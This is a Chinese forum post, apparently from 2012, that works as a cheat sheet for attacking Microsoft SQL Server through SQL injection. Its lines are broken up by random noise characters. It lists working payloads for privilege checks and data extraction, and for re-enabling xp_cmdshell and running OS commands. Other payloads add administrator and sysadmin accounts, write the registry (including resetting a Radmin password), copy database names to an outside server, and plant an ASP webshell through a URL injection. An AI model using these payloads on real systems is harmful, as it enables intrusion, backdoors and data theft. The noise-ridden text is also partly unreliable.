//看看是什么权限的- Y: w# p" G$ u' b* `+ M
and 1=(Select IS_MEMBER('db_owner')) \5 @2 e# F9 ^* w3 r, l
And char(124)%2BCast(IS_MEMBER('db_owner') as varchar(1))%2Bchar(124)=1 ;--
" W" e1 v8 r8 ^7 \1 F9 k
# G k" M# \1 l- P) D9 y, ^/ g) _//检测是否有读取某数据库的权限
3 x6 N, d5 @6 \ F4 N" Pand 1= (Select HAS_DBACCESS('master'))# w% w& v/ k) J+ [% w' m
And char(124)%2BCast(HAS_DBACCESS('master') as varchar(1))%2Bchar(124)=1 --
" z% D1 ?# }7 q4 j# F. ~! t }3 h" ]# o* u" \# C
. `/ l: p3 H( m% v+ U$ Z
数字类型# \5 j7 b# _) ^! K
and char(124)%2Buser%2Bchar(124)=0( E! Z! A+ P i- T+ _! r
8 j! N' a" i; N# ]' i6 w" i1 }
字符类型4 R9 B8 h2 w" F! o) B- g" |2 ?
' and char(124)%2Buser%2Bchar(124)=0 and ''='
2 z: G# |2 I1 J8 E
7 K: ^4 `% I( |! z搜索类型" D' R' K ]0 \" J0 J" o
' and char(124)%2Buser%2Bchar(124)=0 and '%'='2 q: [9 A! u7 [+ l3 [" A# w1 o
' o* r5 m9 w% I( v
爆用户名# J5 n' |' o8 K
and user>0
8 ?3 X k% l3 G% f" e' and user>0 and ''='
' T1 c5 a! s: X% ]3 z) M, y P. H5 [8 P" B" S/ t% b
检测是否为SA权限0 t! N9 f: O: m% Q" W- v1 D4 z2 V
and 1=(select IS_SRVROLEMEMBER('sysadmin'));--
1 H3 ~7 y8 i+ W- r, f) h0 wAnd char(124)%2BCast(IS_SRVROLEMEMBER(0x730079007300610064006D0069006E00) as varchar(1))%2Bchar(124)=1 --' Y8 y0 h; `" G; i, P5 ?' t+ P% U
7 x- F3 J1 D( P2 ^
检测是不是MSSQL数据库
, E7 m/ s9 [' U) C) eand exists (select * from sysobjects);--
2 X' }% W/ t5 K$ Y X: A" i
. b; Y- [9 G. l9 V检测是否支持多行
6 l: T$ }9 D8 _$ j9 c* i6 Z;declare @d int;--+ I+ M' X. L7 l0 N
9 F2 t: ~5 c. k5 K6 x# ]4 G恢复 xp_cmdshell
0 ?6 \/ {. \5 m- ~6 v;exec master..dbo.sp_addextendedproc 'xp_cmdshell','xplog70.dll';--2 N1 `0 a9 V! ?% q
8 P) l2 H! [6 M1 x) S4 D3 C% l$ v& U8 V {
select * from openrowset('sqloledb','server=192.168.1.200,1433;uid=test;pwd=pafpaf','select @@version')
" ~) V9 q9 `" T) R6 P
: [3 Z7 x+ A) b) U& p' T( W//-----------------------7 V O% c' H7 Y6 |/ o! c9 I
// 执行命令
( e- y% x! |/ j' r5 M3 g//-----------------------" O1 R, V# i: P) q. R
首先开启沙盘模式:0 K% f/ X8 y- X, Z0 f
exec master..xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Jet\4.0\Engines','SandBoxMode','REG_DWORD',1
- e2 {; `" V, D$ [" ]- D8 P3 K' d! b( m: W$ y4 y) g$ R3 D
然后利用jet.oledb执行系统命令
$ \# U# a- T0 s3 Q9 d1 Q9 Eselect * from openrowset('microsoft.jet.oledb.4.0',';database=c:\winnt\system32\ias\ias.mdb','select shell("cmd.exe /c net user admin admin1234 /add")')
% G3 _3 r7 |3 Y( r) Y
8 [! O# ]2 k, G) |, @- O. o执行命令1 K( B2 U* C: k6 F
;DECLARE @shell INT EXEC SP_OAcreate 'wscript.shell',@shell OUTPUT EXEC SP_OAMETHOD @shell,'run',null, 'C:\WINNT\system32\cmd.exe /c net user paf pafpaf /add';--
2 A' B7 m, _6 x4 U5 I! e( r$ I6 _3 K! `: C5 [3 ]
EXEC [master].[dbo].[xp_cmdshell] 'cmd /c md c:\1111'
0 Z7 c I& n: i) O, M& ^) H' K' x" o1 y& F" ^: G: b8 m4 y( q
判断xp_cmdshell扩展存储过程是否存在:
# B# R! f" _: k/ r" Khttp://192.168.1.5/display.asp?keyno=188 and 1=(Select count(*) FROM master.dbo.sysobjects Where xtype = 'X' AND name = 'xp_cmdshell')% _( n0 [7 ~" q( b8 G2 k& _
L, k5 T' o% c8 Z3 k
写注册表
5 T! j6 ~! T# V8 l/ Q* s/ T" }exec master..xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Jet\4.0\Engines','SandBoxMode','REG_DWORD',1
# _5 Q: Q/ L2 s* M7 o8 W' N ~; Z6 A$ B
REG_SZ
( f( i4 |5 m4 p7 b" ?2 @; f& W/ k. ]; ~8 r/ `- r
读注册表/ g# g& H0 X& q) q+ [6 u
exec master..xp_regread 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon','Userinit'
8 _% r" |* `$ R! w
- D3 c4 w- z: k h7 Y1 u) C读取目录内容. l; Y5 U# ]2 @9 O" l
exec master..xp_dirtree 'c:\winnt\system32\',1,1
- K9 a6 w/ b2 i: `4 [ c9 }
}$ z, F' G0 s+ D4 t+ `5 n3 ]6 @1 r! v
数据库备份
1 B# F3 |7 o: I$ p) Tbackup database pubs to disk = 'c:\123.bak'0 s4 _' I: a! W0 [9 `( F
3 M0 X0 N1 d4 u" t
//爆出长度* u# S( R$ h; }- Z
And (Select char(124)%2BCast(Count(1) as varchar(8000))%2Bchar(124) From D99_Tmp)=0 ;--
% j2 o+ s# n# y' C6 a, F) ]1 k
4 I, P8 L* r( Y) v; F3 e6 n/ L9 c6 A2 d( G% u2 Y- S
6 t3 y9 Y1 G7 v/ s更改sa口令方法:用sql综合利用工具连接后,执行命令:( a. E$ Y' h- b s7 {3 o# o
exec sp_password NULL,'新密码','sa'
$ L2 S3 d7 L5 E) k$ \: R3 j% s/ w6 S
添加和删除一个SA权限的用户test:
, ^7 [# b+ M t$ D8 G |exec master.dbo.sp_addlogin test,9530772
& U/ j( |6 R$ Z: ]exec master.dbo.sp_addsrvrolemember test,sysadmin* S# ~( U& t+ t3 F+ C
& H# j3 C" S7 b9 S: f1 P删除扩展存储过过程xp_cmdshell的语句:
# F6 T0 d& M9 O' G' t U: R8 bexec sp_dropextendedproc 'xp_cmdshell'# l; X9 f0 {2 y7 [! U
3 o* J; }8 ?, Y# W/ j添加扩展存储过过程" ~) I5 s% X0 L7 p O
EXEC [master]..sp_addextendedproc 'xp_proxiedadata', 'c:\winnt\system32\sqllog.dll'+ F4 O( h/ Q& {; D
GRANT exec On xp_proxiedadata TO public
. A+ ^( ~ q6 c. j2 r, O) w( F* M `4 j& S
( R) A+ D( `7 i- j% m* B4 F停掉或激活某个服务。( T0 Q/ z4 n& `' Q. b
7 ^8 V: n# F% l. l9 a0 x' j. T
exec master..xp_servicecontrol 'stop','schedule': j' P+ y: B2 E' ?5 N
exec master..xp_servicecontrol 'start','schedule'
7 }3 O9 e. }* Q5 C1 [
* x0 X* c) H- b; v# C' b5 m7 Adbo.xp_subdirs
* i) Q9 Y Z/ U. ~6 u
; ?! M+ w5 H; l只列某个目录下的子目录。
+ n9 K7 E- j0 }2 H. _9 x; E/ Kxp_getfiledetails 'C:\Inetpub\wwwroot\SQLInject\login.asp'
+ |2 L1 [6 W$ n) S
8 {7 E0 V% p! |& g* H- h: Ydbo.xp_makecab$ R9 R* Z! o, U* d0 B+ `
g' C, r' v: \7 n1 T1 Y将目标多个档案压缩到某个目标档案之内。
: V1 A) j" T( ~( B: i' b所有要压缩的档案都可以接在参数列的最后方,以逗号隔开。
6 F# g2 d# d* e) m, Q
/ `+ ~, v" x( ]0 Fdbo.xp_makecab
) {) `( Y4 j4 L'c:\test.cab','mszip',1,
, p T; F& j( @: d% P- b'C:\Inetpub\wwwroot\SQLInject\login.asp',
& Q6 s7 |5 o2 Z' ?0 m'C:\Inetpub\wwwroot\SQLInject\securelogin.asp'# |9 W6 k: L1 f
_% Z \* x. S+ y
xp_terminate_process
8 A# B6 ~+ s% T4 d7 S" o5 V7 C+ ^2 x$ A4 Z5 n
停掉某个执行中的程序,但赋予的参数是 Process ID。
4 F* D) v% M# J* V; ?% i3 e2 ?* u利用”工作管理员”,透过选单「检视」-「选择字段」勾选 pid,就可以看到每个执行程序的 Process ID+ `. M& E, O# h6 y1 Q( v
+ d5 I0 V0 }" @" l
xp_terminate_process 2484* o( E% m" L* U C5 g( q/ |1 }
3 D6 P8 E8 _% k _xp_unpackcab
- B5 v6 U( d: F- X. B* R/ f; n$ h4 r! z x9 Y+ ^, I0 D
解开压缩档。6 K, o0 X; d! R% R
) K, H, Q. u7 Y1 U: Z/ j
xp_unpackcab 'c:\test.cab','c:\temp',1
- W5 y$ Z, M0 u- P9 ]- _' a7 `0 D* E) ]
) u; d+ F, C& q# l' b某机,安装了radmin,密码被修改了,regedit.exe不知道被删除了还是被改名了,net.exe不存在,没有办法使用regedit /e 导入注册文件,但是mssql是sa权限,使用如下命令 EXEC master.dbo.xp_regwrite 'HKEY_LOCAL_MACHINE','SYSTEM\RAdmin\v2.0\Server\Parameters','Parameter','REG_BINARY',0x02ba5e187e2589be6f80da0046aa7e3c 即可修改密码为12345678。如果要修改端口值 EXEC master.dbo.xp_regwrite 'HKEY_LOCAL_MACHINE','SYSTEM\RAdmin\v2.0\Server\Parameters','port','REG_BINARY',0xd20400 则端口值改为1234) s: N) ?3 P9 o. t- T/ g$ S o
( O2 K' S0 P3 R$ X3 T
create database lcx;
" f) y- }3 v# E6 J5 @, I: }Create TABLE ku(name nvarchar(256) null);6 _. Z; k5 X2 e9 d2 P6 _% a0 h
Create TABLE biao(id int NULL,name nvarchar(256) null);
( p; {* ]# y$ o `: [' b. J1 M3 R- j( s$ W1 j
//得到数据库名; l. t0 }% }" }5 p$ h3 E- h% P' Q$ O* @
insert into opendatasource('sqloledb','server=211.39.145.163,1443;uid=test;pwd=pafpaf;database=lcx').lcx.dbo.ku select name from master.dbo.sysdatabases
o% z3 D) N! @/ }( D9 Y- s' O# ^$ T9 ~) I2 V' g
6 Z( q- x0 m( m b! ^2 E Z//在Master中创建表,看看权限怎样
6 S3 w- e3 J: |8 G3 y9 sCreate TABLE master..D_TEST(id nvarchar(4000) NULL,Data nvarchar(4000) NULL);--+ ]0 q. _( z) H* m
) p5 Q7 a% b' a3 P. P i! P3 m用 sp_makewebtask直接在web目录里写入一句话马:4 u) V% l" h, A9 s2 C5 n# j
http://127.0.0.1/dblogin123.asp?username=123';exec%20sp_makewebtask%20'd:\www\tt\88.asp','%20select%20''<%25execute(request("a"))%25>''%20';--
: W$ x$ k4 w. y3 v- ^$ }, {. ^9 G7 ]: R) I9 `# `8 p. W R2 f' [
//更新表内容7 J; b0 k' r* J6 I" l$ H5 \
Update films SET kind = 'Dramatic' Where id = 123
9 O/ I" d I$ w- c& Q2 Q+ o. ?' O
9 b: r8 c: K4 B) p* m/ a//删除内容
0 ^( [* `8 ]% N8 ]" O( pdelete from table_name where Stockid = 3 |
发表于 2012-9-15 14:40:13
收藏
支持
反对